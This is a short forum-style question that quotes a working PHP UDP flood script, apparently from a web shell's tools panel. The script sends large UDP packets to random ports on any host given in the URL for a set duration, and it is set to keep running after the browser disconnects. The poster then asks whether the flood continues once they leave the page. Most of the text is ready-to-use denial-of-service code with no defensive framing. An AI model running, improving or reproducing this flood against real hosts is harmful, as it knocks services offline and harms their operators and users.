    if(isset($_GET['host'])&&is_numeric($_GET['time'])){ $pakits = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); //print "Started: ".time('h:i:s')."<br>"; $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $pakits++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n"; echo '<br><br> <form action="'.$surl.'" method=GET> <input type="hidden" name="act" value="phptools"> Host: <input type=text name=host value=localhost> Length (seconds): <input type=text name=time value=9999> <input type=submit value=Go></form>'; }else{ echo '<br><b>UDP Flood</b><br> <form action=? method=GET> <input type="hidden" name="act" value="phptools"> Host: <br><input type=text name=host value=localhost><br> Length (seconds): <br><input type=text name=time value=9999><br> <br> <input type=submit value=Go></form>'; } I've been looking around and asking my friends for awhile now, if I use this script to tell the server to open the sockets using fsockopen, if I leave the webpage will the sockets remain open until the duration is completed?

    Read the article
